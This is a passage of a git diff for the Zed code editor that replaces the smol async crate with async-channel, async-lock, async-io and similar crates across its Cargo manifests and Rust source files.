crates/context_server/src/listener.rs | 5 +- crates/context_server/src/oauth.rs | 36 +++--- crates/context_server/src/transport/http.rs | 112 +++++++++--------- .../src/transport/stdio_transport.rs | 21 ++-- crates/crashes/Cargo.toml | 2 +- crates/crashes/src/crashes.rs | 26 ++-- crates/db/Cargo.toml | 1 - crates/db/src/db.rs | 11 +- crates/db/src/kvp.rs | 2 +- crates/edit_prediction_cli/src/main.rs | 4 +- crates/editor/Cargo.toml | 2 +- crates/editor/src/display_map.rs | 2 +- crates/editor/src/display_map/wrap_map.rs | 9 +- crates/editor/src/hover_popover.rs | 2 +- crates/editor/src/lsp_ext.rs | 2 +- .../src/test/editor_lsp_test_context.rs | 2 +- crates/fs/Cargo.toml | 1 + crates/fs/src/fake_git_repo.rs | 7 +- crates/fs/src/fs.rs | 12 +- crates/fs/src/fs_watcher.rs | 4 +- crates/fs/tests/integration/fs.rs | 8 +- crates/git/Cargo.toml | 1 + crates/git/src/repository.rs | 8 +- crates/git_graph/Cargo.toml | 2 +- crates/git_graph/src/git_graph.rs | 2 +- crates/git_ui/Cargo.toml | 2 +- crates/git_ui/src/project_diff.rs | 2 +- crates/gpui/src/gpui.rs | 2 + crates/gpui/src/test.rs | 2 +- crates/gpui_wgpu/src/wgpu_atlas.rs | 2 +- crates/gpui_wgpu/src/wgpu_context.rs | 2 +- crates/language/Cargo.toml | 2 +- crates/language/src/buffer.rs | 2 +- crates/language/src/buffer_tests.rs | 3 +- crates/language/src/language.rs | 2 +- crates/language/src/language_registry.rs | 14 +-- crates/language_model_core/Cargo.toml | 2 +- .../language_model_core/src/rate_limiter.rs | 2 +- crates/language_models/Cargo.toml | 2 +- .../language_models/src/provider/bedrock.rs | 2 +- crates/language_models_cloud/Cargo.toml | 1 - .../src/language_models_cloud.rs | 4 +- crates/multi_buffer/Cargo.toml | 2 +- crates/multi_buffer/src/multi_buffer.rs | 2 +- crates/notifications/Cargo.toml | 2 +- .../notifications/src/notification_store.rs | 2 +- crates/outline/Cargo.toml | 2 +- crates/outline/src/outline.rs | 2 +- crates/outline_panel/Cargo.toml | 3 +- crates/outline_panel/src/outline_panel.rs | 9 +- crates/project/Cargo.toml | 1 + crates/project/src/buffer_store.rs | 6 +- crates/project/src/git_store.rs | 10 +- crates/project/src/lsp_store.rs | 10 +- crates/project/src/project.rs | 2 +- crates/project/src/project_search.rs | 2 +- crates/project/src/terminals.rs | 2 +- crates/recent_projects/Cargo.toml | 1 - crates/recent_projects/src/remote_servers.rs | 3 +- crates/remote_server/Cargo.toml | 1 + crates/remote_server/src/server.rs | 15 ++- crates/search/Cargo.toml | 2 +- crates/search/src/buffer_search.rs | 2 +- crates/search/src/project_search.rs | 2 +- crates/sidebar/Cargo.toml | 2 +- crates/sidebar/src/sidebar.rs | 8 +- crates/sqlez/Cargo.toml | 2 +- crates/sqlez/src/thread_safe_connection.rs | 2 +- crates/terminal/Cargo.toml | 3 +- crates/terminal/src/terminal.rs | 19 +-- crates/workspace/Cargo.toml | 1 + crates/workspace/src/workspace.rs | 3 +- crates/worktree/Cargo.toml | 2 +- crates/worktree/src/worktree.rs | 34 +++--- crates/zed/src/main.rs | 3 +- crates/zed/src/zed/visual_tests.rs | 10 +- 100 files changed, 358 insertions(+), 341 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 29bd35ca97de9b..0c029906834738 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -9,6 +9,7 @@ dependencies = [ "action_log", "agent-client-protocol", "anyhow", + "async-channel 2.5.0", "base64 0.22.1", "buffer_diff", "chrono", @@ -34,7 +35,6 @@ dependencies = [ "serde", "serde_json", "settings", - "smol", "task", "telemetry", "terminal", @@ -152,6 +152,8 @@ dependencies = [ "agent_servers", "agent_settings", "anyhow", + "async-channel 2.5.0", + "async-io", "chrono", "client", "clock", @@ -198,7 +200,6 @@ dependencies = [ "settings", "shell_command_parser", "smallvec", - "smol", "sqlez", "streaming_diff", "strsim", @@ -280,6 +281,7 @@ dependencies = [ "action_log", "agent-client-protocol", "anyhow", + "async-channel 2.5.0", "chrono", "client", "collections", @@ -303,7 +305,6 @@ dependencies = [ "serde", "serde_json", "settings", - "smol", "task", "tempfile", "terminal", @@ -351,6 +352,7 @@ dependencies = [ "agent_settings", "ai_onboarding", "anyhow", + "async-channel 2.5.0", "audio", "base64 0.22.1", "buffer_diff", @@ -419,7 +421,6 @@ dependencies = [ "serde_json", "serde_json_lenient", "settings", - "smol", "streaming_diff", "task", "telemetry", @@ -935,7 +936,7 @@ version = "2.2.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "8034a681df4aed8b8edbd7fbe472401ecf009251c8b40556b304567052e294c5" dependencies = [ - "async-lock 3.4.2", + "async-lock", "blocking", "futures-lite 2.6.1", ] @@ -949,7 +950,7 @@ dependencies = [ "async-channel 2.5.0", "async-executor", "async-io", - "async-lock 3.4.2", + "async-lock", "blocking", "futures-lite 2.6.1", "once_cell", @@ -973,15 +974,6 @@ dependencies = [ "windows-sys 0.61.2", ] -[[package]] -name = "async-lock" -version = "2.8.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "287272293e9d8c41773cec55e365490fe034813a2f172f502d6ddcf75b2f582b" -dependencies = [ - "event-listener 2.5.3", -] - [[package]] name = "async-lock" version = "3.4.2" @@ -1021,7 +1013,7 @@ checksum = "fc50921ec0055cdd8a16de48773bfeec5c972598674347252c0399676be7da75" dependencies = [ "async-channel 2.5.0", "async-io", - "async-lock 3.4.2", + "async-lock", "async-signal", "async-task", "blocking", @@ -1049,7 +1041,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "43c070bbf59cd3570b6b2dd54cd772527c7c3620fce8be898406dd3ed6adc64c" dependencies = [ "async-io", - "async-lock 3.4.2", + "async-lock", "atomic-waker", "cfg-if", "futures-core", @@ -1070,7 +1062,7 @@ dependencies = [ "async-channel 1.9.0", "async-global-executor", "async-io", - "async-lock 3.4.2", + "async-lock", "async-process", "crossbeam-utils", "futures-channel", @@ -2962,6 +2954,7 @@ name = "client" version = "0.1.0" dependencies = [ "anyhow", + "async-channel 2.5.0", "async-tungstenite", "base64 0.22.1", "chrono", @@ -3029,6 +3022,7 @@ name = "cloud_api_client" version = "0.1.0" dependencies = [ "anyhow", + "async-lock", "cloud_api_types", "futures 0.3.32", "gpui", @@ -3036,7 +3030,6 @@ dependencies = [ "http_client", "parking_lot", "serde_json", - "smol", "thiserror 2.0.17", "yawc", ] @@ -3183,6 +3176,7 @@ version = "0.44.0" dependencies = [ "agent", "anyhow", + "async-channel 2.5.0", "async-trait", "async-tungstenite", "aws-config", @@ -3560,15 +3554,19 @@ name = "context_server" version = "0.1.0" dependencies = [ "anyhow", + "async-channel 2.5.0", + "async-process", "async-trait", "base64 0.22.1", "collections", "futures 0.3.32", + "futures-lite 1.13.0", "gpui", "http_client", "log", "net", "parking_lot", + "pollster 0.4.0", "postage", "rand 0.9.3", "schemars 1.0.4", @@ -3577,7 +3575,6 @@ dependencies = [ "settings", "sha2", "slotmap", - "smol", "tempfile", "tiny_http", "url", @@ -4114,6 +4111,7 @@ dependencies = [ name = "crashes" version = "0.1.0" dependencies = [ + "async-process", "cfg-if", "crash-handler", "futures 0.3.32", @@ -4125,7 +4123,6 @@ dependencies = [ "release_channel", "serde", "serde_json", - "smol", "system_specs", "windows 0.61.3", "zstd", @@ -4657,7 +4654,6 @@ dependencies = [ "log", "paths", "release_channel", - "smol", "sqlez", "sqlez_macros", "tempfile", @@ -5476,6 +5472,7 @@ dependencies = [ "file_icons", "fs", "futures 0.3.32", + "futures-lite 1.13.0", "fuzzy", "git", "gpui", @@ -5506,7 +5503,6 @@ dependencies = [ "serde_json", "settings", "smallvec", - "smol", "snippet", "sum_tree", "task", @@ -6590,6 +6586,7 @@ version = "0.1.0" dependencies = [ "anyhow", "ashpd", + "async-channel 2.5.0", "async-tar", "async-trait", "collections", @@ -7267,6 +7264,7 @@ version = "0.1.0" dependencies = [ "anyhow", "askpass", + "async-channel 2.5.0", "async-trait", "collections", "derive_more", @@ -7316,6 +7314,7 @@ name = "git_graph" version = "0.1.0" dependencies = [ "anyhow", + "async-channel 2.5.0", "collections", "db", "editor", @@ -7334,7 +7333,6 @@ dependencies = [ "serde_json", "settings", "smallvec", - "smol", "theme", "theme_settings", "time", @@ -7382,6 +7380,7 @@ dependencies = [ "file_icons", "fs", "futures 0.3.32", + "futures-lite 1.13.0", "fuzzy", "fuzzy_nucleo", "git", @@ -7410,7 +7409,6 @@ dependencies = [ "serde_json", "settings", "smallvec", - "smol", "strum 0.27.2", "task", "telemetry", @@ -9475,6 +9473,7 @@ dependencies = [ "encoding_rs", "fs", "futures 0.3.32", + "futures-lite 1.13.0", "fuzzy", "globset", "gpui", @@ -9497,7 +9496,6 @@ dependencies = [ "settings", "shellexpand", "smallvec", - "smol", "streaming-iterator", "strsim", "sum_tree", @@ -9595,6 +9593,7 @@ name = "language_model_core" version = "0.1.0" dependencies = [ "anyhow", + "async-lock", "cloud_llm_client", "futures 0.3.32", "gpui_shared_string", @@ -9603,7 +9602,6 @@ dependencies = [ "schemars 1.0.4", "serde", "serde_json", - "smol", "strum 0.27.2", "thiserror 2.0.17", ] @@ -9615,6 +9613,7 @@ dependencies = [ "ai_onboarding", "anthropic", "anyhow", + "async-lock", "aws-config", "aws-credential-types", "aws_http_client", @@ -9656,7 +9655,6 @@ dependencies = [ "serde", "serde_json", "settings", - "smol", "strum 0.27.2", "tokio", "ui", @@ -9683,7 +9681,6 @@ dependencies = [ "semver", "serde", "serde_json", - "smol", "thiserror 2.0.17", ] @@ -10912,6 +10909,7 @@ dependencies = [ "clock", "collections", "ctor", + "futures-lite 1.13.0", "gpui", "indoc", "itertools 0.14.0", @@ -10924,7 +10922,6 @@ dependencies = [ "serde", "settings", "smallvec", - "smol", "sum_tree", "text", "theme", @@ -11198,7 +11195,7 @@ dependencies = [ "channel", "client", "component", - "db", + "futures-lite 1.13.0", "gpui", "rpc", "sum_tree", @@ -11792,7 +11789,7 @@ dependencies = [ "ashpd", "async-fs", "async-io", - "async-lock 3.4.2", + "async-lock", "blocking", "cbc", "cipher", @@ -12035,6 +12032,7 @@ name = "outline" version = "0.1.0" dependencies = [ "editor", + "futures 0.3.32", "fuzzy", "gpui", "indoc", @@ -12047,7 +12045,6 @@ dependencies = [ "rope", "serde_json", "settings", - "smol", "theme", "theme_settings", "ui", @@ -12061,10 +12058,12 @@ name = "outline_panel" version = "0.1.0" dependencies = [ "anyhow", + "async-channel 2.5.0", "collections", "db", "editor", "file_icons", + "futures 0.3.32", "fuzzy", "gpui", "itertools 0.14.0", @@ -12080,7 +12079,6 @@ dependencies = [ "serde_json", "settings", "smallvec", - "smol", "theme", "theme_settings", "ui", @@ -13440,6 +13438,7 @@ dependencies = [ "aho-corasick", "anyhow", "askpass", + "async-channel 2.5.0", "async-trait", "base64 0.22.1", "buffer_diff", @@ -14404,7 +14403,6 @@ dependencies = [ "serde", "serde_json", "settings", - "smol", "task", "telemetry", "ui", @@ -14606,6 +14604,7 @@ dependencies = [ "agent", "anyhow", "askpass", + "async-channel 2.5.0", "cargo_toml", "clap", "client", @@ -15744,6 +15743,7 @@ dependencies = [ "editor", "fs", "futures 0.3.32", + "futures-lite 1.13.0", "gpui", "itertools 0.14.0", "language", @@ -15755,7 +15755,6 @@ dependencies = [ "serde", "serde_json", "settings", - "smol", "theme", "theme_settings", "tracing", @@ -16304,6 +16303,7 @@ dependencies = [ "agent_settings", "agent_ui", "anyhow", + "async-channel 2.5.0", "chrono", "client", "clock", @@ -16333,7 +16333,6 @@ dependencies = [ "serde", "serde_json", "settings", - "smol", "telemetry", "theme", "theme_settings", @@ -16518,7 +16517,7 @@ dependencies = [ "async-executor", "async-fs", "async-io", - "async-lock 3.4.2", + "async-lock", "async-net", "async-process", "blocking", @@ -16689,7 +16688,7 @@ dependencies = [ "libsqlite3-sys", "log", "parking_lot", - "smol", + "pollster 0.4.0", "sqlformat", "thread_local", "util", @@ -17773,8 +17772,10 @@ version = "0.1.0" dependencies = [ "alacritty_terminal", "anyhow", + "async-channel 2.5.0", "collections", "futures 0.3.32", + "futures-lite 1.13.0", "gpui", "itertools 0.14.0", "libc", @@ -17787,7 +17788,6 @@ dependencies = [ "schemars 1.0.4", "serde", "settings", - "smol", "sysinfo 0.37.2", "task", "theme", @@ -21929,6 +21929,7 @@ dependencies = [ "db", "fs", "futures 0.3.32", + "futures-lite 1.13.0", "git", "gpui", "http_client", @@ -21971,7 +21972,8 @@ name = "worktree" version = "0.1.0" dependencies = [ "anyhow", - "async-lock 2.8.0", + "async-channel 2.5.0", + "async-lock", "chardetng", "clock", "collections", @@ -21994,7 +21996,6 @@ dependencies = [ "serde_json", "settings", "smallvec", - "smol", "sum_tree", "text", "tracing", @@ -22331,7 +22332,7 @@ dependencies = [ "async-broadcast", "async-executor", "async-io", - "async-lock 3.4.2", + "async-lock", "async-process", "async-recursion", "async-task", diff --git a/Cargo.toml b/Cargo.toml index b8462617ab367b..69d2a5c2f59ecc 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -515,13 +515,15 @@ async-compat = "0.2.1" async-compression = { version = "0.4", features = ["bzip2", "gzip", "futures-io"] } async-dispatcher = "0.1" async-fs = "2.1" -async-lock = "2.1" +async-io = "2.6.0" +async-lock = "3.4.2" async-pipe = { git = "https://github.com/zed-industries/async-pipe-rs", rev = "82d00a04211cf4e1236029aa03e6b6ce2a74c553" } async-recursion = "1.0.0" async-tar = "0.5.1" async-task = "4.7" async-trait = "0.1" async-tungstenite = "0.31.0" +async-process = "2.5.0" async_zip = { version = "0.0.18", features = ["deflate", "deflate64"] } aws-config = { version = "1.8.10", features = ["behavior-version-latest"] } aws-credential-types = { version = "1.2.8", features = [ diff --git a/crates/acp_thread/Cargo.toml b/crates/acp_thread/Cargo.toml index 56ead8ada6ca82..987db1dcf8e654 100644 --- a/crates/acp_thread/Cargo.toml +++ b/crates/acp_thread/Cargo.toml @@ -18,6 +18,7 @@ test-support = ["gpui/test-support", "project/test-support", "dep:parking_lot", [dependencies] action_log.workspace = true agent-client-protocol.workspace = true +async-channel.workspace = true base64.workspace = true anyhow.workspace = true buffer_diff.workspace = true @@ -41,7 +42,6 @@ prompt_store.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true -smol.workspace = true task.workspace = true telemetry.workspace = true terminal.workspace = true diff --git a/crates/acp_thread/src/acp_thread.rs b/crates/acp_thread/src/acp_thread.rs index 61bee3ff85d066..42c6af38362fb1 100644 --- a/crates/acp_thread/src/acp_thread.rs +++ b/crates/acp_thread/src/acp_thread.rs @@ -3047,6 +3047,7 @@ fn markdown_for_raw_output( mod tests { use super::*; use anyhow::anyhow; + use futures::stream::StreamExt as _; use futures::{channel::mpsc, future::LocalBoxFuture, select}; use gpui::{App, AsyncApp, TestAppContext, WeakEntity}; use indoc::indoc; @@ -3054,7 +3055,6 @@ mod tests { use rand::{distr, prelude::*}; use serde_json::json; use settings::SettingsStore; - use smol::stream::StreamExt as _; use std::{ any::Any, cell::RefCell, @@ -3259,7 +3259,7 @@ mod tests { // Create a real PTY terminal that runs a command which prints output then sleeps // We use printf instead of echo and chain with && sleep to ensure proper execution - let (completion_tx, _completion_rx) = smol::channel::unbounded(); + let (completion_tx, _completion_rx) = async_channel::unbounded(); let (program, args) = ShellBuilder::new(&Shell::System, false).build( Some("printf 'output_before_kill\\n' && sleep 60".to_owned()), &[], diff --git a/crates/acp_thread/src/connection.rs b/crates/acp_thread/src/connection.rs index 4bbf13bdb5ddcf..bbb967530e3a5f 100644 --- a/crates/acp_thread/src/connection.rs +++ b/crates/acp_thread/src/connection.rs @@ -318,7 +318,7 @@ pub trait AgentSessionList { Task::ready(Err(anyhow::anyhow!("delete_sessions not supported"))) } - fn watch(&self, _cx: &mut App) -> Option> { + fn watch(&self, _cx: &mut App) -> Option> { None } diff --git a/crates/agent/Cargo.toml b/crates/agent/Cargo.toml index a5a4c2742a444b..ce472fd9e36ee9 100644 --- a/crates/agent/Cargo.toml +++ b/crates/agent/Cargo.toml @@ -19,6 +19,7 @@ workspace = true [dependencies] acp_thread.workspace = true action_log.workspace = true +async-channel.workspace = true agent-client-protocol.workspace = true agent_servers.workspace = true agent_settings.workspace = true @@ -59,7 +60,6 @@ serde_json.workspace = true settings.workspace = true shell_command_parser.workspace = true smallvec.workspace = true -smol.workspace = true sqlez.workspace = true streaming_diff.workspace = true strsim.workspace = true @@ -77,6 +77,7 @@ zed_env_vars.workspace = true zstd.workspace = true [dev-dependencies] +async-io.workspace = true agent_servers = { workspace = true, "features" = ["test-support"] } client = { workspace = true, "features" = ["test-support"] } clock = { workspace = true, "features" = ["test-support"] } diff --git a/crates/agent/src/agent.rs b/crates/agent/src/agent.rs index c5bc4c582852b0..45da8c92169a29 100644 --- a/crates/agent/src/agent.rs +++ b/crates/agent/src/agent.rs @@ -1743,14 +1743,14 @@ impl acp_thread::AgentTelemetry for NativeAgentConnection { pub struct NativeAgentSessionList { thread_store: Entity, - updates_tx: smol::channel::Sender, - updates_rx: smol::channel::Receiver, + updates_tx: async_channel::Sender, + updates_rx: async_channel::Receiver, _subscription: Subscription, } impl NativeAgentSessionList { fn new(thread_store: Entity, cx: &mut App) -> Self { - let (tx, rx) = smol::channel::unbounded(); + let (tx, rx) = async_channel::unbounded(); let this_tx = tx.clone(); let subscription = cx.observe(&thread_store, move |_, _| { this_tx @@ -1802,7 +1802,7 @@ impl AgentSessionList for NativeAgentSessionList { fn watch( &self, _cx: &mut App, - ) -> Option> { + ) -> Option> { Some(self.updates_rx.clone()) } diff --git a/crates/agent/src/edit_agent/evals.rs b/crates/agent/src/edit_agent/evals.rs index ba8b7ed867ea26..c1c2886f84e0aa 100644 --- a/crates/agent/src/edit_agent/evals.rs +++ b/crates/agent/src/edit_agent/evals.rs @@ -1670,7 +1670,7 @@ async fn retry_on_rate_limit(mut request: impl AsyncFnMut() -> Result) -> eprintln!("Attempt #{attempt}: Retry after {retry_after:?} + jitter of {jitter:?}"); // This code does not use the gpui::executor #[allow(clippy::disallowed_methods)] - smol::Timer::after(retry_after + jitter).await; + async_io::Timer::after(retry_after + jitter).await; } else { return response; } diff --git a/crates/agent/src/tools/evals/streaming_edit_file.rs b/crates/agent/src/tools/evals/streaming_edit_file.rs index 0c6290ec098f9c..3156fd253978bc 100644 --- a/crates/agent/src/tools/evals/streaming_edit_file.rs +++ b/crates/agent/src/tools/evals/streaming_edit_file.rs @@ -729,7 +729,7 @@ async fn retry_on_rate_limit(mut request: impl AsyncFnMut() -> Result) -> let jitter = retry_after.mul_f64(rand::rng().random_range(0.0..1.0)); eprintln!("Attempt #{attempt}: Retry after {retry_after:?} + jitter of {jitter:?}"); #[allow(clippy::disallowed_methods)] - smol::Timer::after(retry_after + jitter).await; + async_io::Timer::after(retry_after + jitter).await; } else { return response; } diff --git a/crates/agent_servers/Cargo.toml b/crates/agent_servers/Cargo.toml index c8970ec57a9050..1a12a5415731b4 100644 --- a/crates/agent_servers/Cargo.toml +++ b/crates/agent_servers/Cargo.toml @@ -20,6 +20,7 @@ doctest = false acp_tools.workspace = true acp_thread.workspace = true action_log.workspace = true +async-channel.workspace = true agent-client-protocol.workspace = true anyhow.workspace = true chrono.workspace = true @@ -43,7 +44,6 @@ reqwest_client = { workspace = true, optional = true } serde.workspace = true serde_json.workspace = true settings.workspace = true -smol.workspace = true task.workspace = true tempfile.workspace = true thiserror.workspace = true diff --git a/crates/agent_servers/src/acp.rs b/crates/agent_servers/src/acp.rs index 28ec60e404314a..57ca7ddeac7a77 100644 --- a/crates/agent_servers/src/acp.rs +++ b/crates/agent_servers/src/acp.rs @@ -286,13 +286,13 @@ pub struct AcpSession { pub struct AcpSessionList { connection: ConnectionTo, - updates_tx: smol::channel::Sender, - updates_rx: smol::channel::Receiver, + updates_tx: async_channel::Sender, + updates_rx: async_channel::Receiver, } impl AcpSessionList { fn new(connection: ConnectionTo) -> Self { - let (tx, rx) = smol::channel::unbounded(); + let (tx, rx) = async_channel::unbounded(); Self { connection, updates_tx: tx, @@ -353,7 +353,7 @@ impl AgentSessionList for AcpSessionList { fn watch( &self, _cx: &mut App, - ) -> Option> { + ) -> Option> { Some(self.updates_rx.clone()) } @@ -1654,7 +1654,7 @@ pub mod test_support { close_session_count: Arc, fail_next_prompt: Arc, exit_status_sender: - Arc>>>, + Arc>>>, } impl FakeAcpAgentServer { @@ -1715,7 +1715,7 @@ pub mod test_support { cx, ) .await?; - let (exit_tx, exit_rx) = smol::channel::bounded(1); + let (exit_tx, exit_rx) = async_channel::bounded(1); *exit_status_sender .lock() .expect("exit status sender lock should not be poisoned") = Some(exit_tx); @@ -2224,7 +2224,7 @@ mod tests { Arc, Arc, Arc>>, - Arc>>>, + Arc>>>, Task>, ) { cx.update(|cx| { @@ -2240,7 +2240,7 @@ mod tests { let close_count = Arc::new(AtomicUsize::new(0)); let load_session_updates: Arc>> = Arc::new(std::sync::Mutex::new(Vec::new())); - let load_session_gate: Arc>>> = + let load_session_gate: Arc>>> = Arc::new(std::sync::Mutex::new(None)); let (client_transport, agent_transport) = agent_client_protocol::Channel::duplex(); @@ -2595,7 +2595,7 @@ mod tests { // Install a gate so the fake agent's `load_session` handler parks // before sending its response. We'll close the session while the // load is parked. - let (gate_tx, gate_rx) = smol::channel::bounded::<()>(1); + let (gate_tx, gate_rx) = async_channel::bounded::<()>(1); *load_session_gate .lock() .expect("load_session_gate mutex poisoned") = Some(gate_rx); @@ -2690,7 +2690,7 @@ mod tests { _keep_agent_alive, ) = connect_fake_agent(cx).await; - let (gate_tx, gate_rx) = smol::channel::bounded::<()>(1); + let (gate_tx, gate_rx) = async_channel::bounded::<()>(1); *load_session_gate .lock() .expect("load_session_gate mutex poisoned") = Some(gate_rx); diff --git a/crates/agent_ui/Cargo.toml b/crates/agent_ui/Cargo.toml index 65be660ed07a78..5f5a7cc7926ff5 100644 --- a/crates/agent_ui/Cargo.toml +++ b/crates/agent_ui/Cargo.toml @@ -30,6 +30,7 @@ acp_thread.workspace = true action_log.workspace = true agent-client-protocol.workspace = true agent.workspace = true +async-channel.workspace = true agent_servers.workspace = true agent_settings.workspace = true ai_onboarding.workspace = true @@ -93,7 +94,6 @@ serde.workspace = true serde_json.workspace = true serde_json_lenient.workspace = true settings.workspace = true -smol.workspace = true streaming_diff.workspace = true task.workspace = true telemetry.workspace = true diff --git a/crates/agent_ui/src/buffer_codegen.rs b/crates/agent_ui/src/buffer_codegen.rs index d5288c564d7211..8be5aa52bc6862 100644 --- a/crates/agent_ui/src/buffer_codegen.rs +++ b/crates/agent_ui/src/buffer_codegen.rs @@ -3,6 +3,7 @@ use agent_settings::AgentSettings; use anyhow::{Context as _, Result}; use collections::HashSet; use editor::{Anchor, AnchorRangeExt, MultiBuffer, MultiBufferSnapshot, ToOffset as _, ToPoint}; +use futures::FutureExt; use futures::{ SinkExt, Stream, StreamExt, TryStreamExt as _, channel::mpsc, @@ -28,7 +29,6 @@ use rope::Rope; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; use settings::Settings as _; -use smol::future::FutureExt; use std::{ cmp, future::Future, diff --git a/crates/agent_ui/src/inline_assistant.rs b/crates/agent_ui/src/inline_assistant.rs index 71aa7baf7816b3..d94e0d8782bc54 100644 --- a/crates/agent_ui/src/inline_assistant.rs +++ b/crates/agent_ui/src/inline_assistant.rs @@ -1849,12 +1849,12 @@ pub mod evals { use eval_utils::{EvalOutput, NoProcessor}; use fs::FakeFs; use futures::channel::mpsc; + use futures::stream::StreamExt as _; use gpui::{AppContext, TestAppContext, UpdateGlobal as _}; use language::Buffer; use language_model::{LanguageModelRegistry, SelectedModel}; use project::Project; use prompt_store::PromptBuilder; - use smol::stream::StreamExt as _; use std::str::FromStr; use std::sync::Arc; use util::test::marked_text_ranges; diff --git a/crates/agent_ui/src/thread_metadata_store.rs b/crates/agent_ui/src/thread_metadata_store.rs index f7ba017c164cd6..ff6eb3b98ec67d 100644 --- a/crates/agent_ui/src/thread_metadata_store.rs +++ b/crates/agent_ui/src/thread_metadata_store.rs @@ -469,8 +469,8 @@ pub struct ThreadMetadataStore { threads_by_session: HashMap, reload_task: Option>>, conversation_subscriptions: HashMap, - pending_thread_ops_tx: smol::channel::Sender, - in_flight_archives: HashMap, smol::channel::Sender<()>)>, + pending_thread_ops_tx: async_channel::Sender, + in_flight_archives: HashMap, async_channel::Sender<()>)>, _db_operations_task: Task<()>, } @@ -526,7 +526,7 @@ impl ThreadMetadataStore { #[cfg(any(test, feature = "test-support"))] pub fn init_global(cx: &mut App) { let db_name = TestMetadataDbName::global(cx); - let db = smol::block_on(db::open_test_db::(&db_name)); + let db = gpui::block_on(db::open_test_db::(&db_name)); let thread_store = cx.new(|cx| Self::new(ThreadMetadataDb(db), cx)); cx.set_global(GlobalThreadMetadataStore(thread_store)); } @@ -786,7 +786,7 @@ impl ThreadMetadataStore { pub fn archive( &mut self, thread_id: ThreadId, - archive_job: Option<(Task<()>, smol::channel::Sender<()>)>, + archive_job: Option<(Task<()>, async_channel::Sender<()>)>, cx: &mut Context, ) { self.update_archived(thread_id, true, cx); @@ -1109,7 +1109,7 @@ impl ThreadMetadataStore { }) .detach(); - let (tx, rx) = smol::channel::unbounded(); + let (tx, rx) = async_channel::unbounded(); let _db_operations_task = cx.background_spawn({ let db = db.clone(); async move { @@ -1787,7 +1787,7 @@ mod tests { fn clear_thread_metadata_remote_connection_backfill(cx: &mut TestAppContext) { let kvp = cx.update(|cx| KeyValueStore::global(cx)); - smol::block_on(kvp.delete_kvp("thread-metadata-remote-connection-backfill".to_string())) + gpui::block_on(kvp.delete_kvp("thread-metadata-remote-connection-backfill".to_string())) .unwrap(); } @@ -1810,7 +1810,7 @@ mod tests { let thread = std::thread::current(); let test_name = thread.name().unwrap_or("unknown_test"); let db_name = format!("THREAD_METADATA_DB_{}", test_name); - let db = ThreadMetadataDb(smol::block_on(db::open_test_db::( + let db = ThreadMetadataDb(gpui::block_on(db::open_test_db::( &db_name, ))); diff --git a/crates/agent_ui/src/threads_archive_view.rs b/crates/agent_ui/src/threads_archive_view.rs index 6204552fe6c614..e6e9ca4f5f5c09 100644 --- a/crates/agent_ui/src/threads_archive_view.rs +++ b/crates/agent_ui/src/threads_archive_view.rs @@ -1335,7 +1335,7 @@ impl PickerDelegate for ProjectPickerDelegate { }) .collect(); - let mut sibling_matches = smol::block_on(fuzzy::match_strings( + let mut sibling_matches = gpui::block_on(fuzzy::match_strings( &sibling_candidates, query, smart_case, @@ -1369,7 +1369,7 @@ impl PickerDelegate for ProjectPickerDelegate { }) .collect(); - let mut recent_matches = smol::block_on(fuzzy::match_strings( + let mut recent_matches = gpui::block_on(fuzzy::match_strings( &recent_candidates, query, smart_case, diff --git a/crates/client/Cargo.toml b/crates/client/Cargo.toml index 532fe38f7df1f6..0a3c49d1237823 100644 --- a/crates/client/Cargo.toml +++ b/crates/client/Cargo.toml @@ -17,6 +17,7 @@ test-support = ["clock/test-support", "collections/test-support", "gpui/test-sup [dependencies] anyhow.workspace = true +async-channel.workspace = true async-tungstenite = { workspace = true, features = ["tokio", "tokio-rustls-manual-roots"] } base64.workspace = true chrono = { workspace = true, features = ["serde"] } diff --git a/crates/client/src/client.rs b/crates/client/src/client.rs index 6e18f18318fa81..95f57a6279727c 100644 --- a/crates/client/src/client.rs +++ b/crates/client/src/client.rs @@ -2181,8 +2181,8 @@ mod tests { }); let server = FakeServer::for_client(user_id, &client, cx).await; - let (done_tx1, done_rx1) = smol::channel::unbounded(); - let (done_tx2, done_rx2) = smol::channel::unbounded(); + let (done_tx1, done_rx1) = async_channel::unbounded(); + let (done_tx2, done_rx2) = async_channel::unbounded(); AnyProtoClient::from(client.clone()).add_entity_message_handler( move |entity: Entity, _: TypedEnvelope, cx| { match entity.read_with(&cx, |entity, _| entity.id) { @@ -2252,8 +2252,8 @@ mod tests { let server = FakeServer::for_client(user_id, &client, cx).await; let entity = cx.new(|_| TestEntity::default()); - let (done_tx1, _done_rx1) = smol::channel::unbounded(); - let (done_tx2, done_rx2) = smol::channel::unbounded(); + let (done_tx1, _done_rx1) = async_channel::unbounded(); + let (done_tx2, done_rx2) = async_channel::unbounded(); let subscription1 = client.add_message_handler( entity.downgrade(), move |_, _: TypedEnvelope, _| { @@ -2287,7 +2287,7 @@ mod tests { let server = FakeServer::for_client(user_id, &client, cx).await; let entity = cx.new(|_| TestEntity::default()); - let (done_tx, done_rx) = smol::channel::unbounded(); + let (done_tx, done_rx) = async_channel::unbounded(); let subscription = client.add_message_handler( entity.clone().downgrade(), move |entity: Entity, _: TypedEnvelope, mut cx| { diff --git a/crates/cloud_api_client/Cargo.toml b/crates/cloud_api_client/Cargo.toml index cf293d83f848e1..716276ccf44a37 100644 --- a/crates/cloud_api_client/Cargo.toml +++ b/crates/cloud_api_client/Cargo.toml @@ -20,6 +20,6 @@ gpui_tokio.workspace = true http_client.workspace = true parking_lot.workspace = true serde_json.workspace = true -smol.workspace = true +async-lock.workspace = true thiserror.workspace = true yawc.workspace = true diff --git a/crates/cloud_api_client/src/llm_token.rs b/crates/cloud_api_client/src/llm_token.rs index 711e0d51b89bf3..662c88ab03064b 100644 --- a/crates/cloud_api_client/src/llm_token.rs +++ b/crates/cloud_api_client/src/llm_token.rs @@ -1,7 +1,7 @@ use std::sync::Arc; +use async_lock::{RwLock, RwLockUpgradableReadGuard, RwLockWriteGuard}; use cloud_api_types::OrganizationId; -use smol::lock::{RwLock, RwLockUpgradableReadGuard, RwLockWriteGuard}; use crate::{ClientApiError, CloudApiClient}; diff --git a/crates/collab/Cargo.toml b/crates/collab/Cargo.toml index 0703d88a2c0f2f..f96b71c380ca54 100644 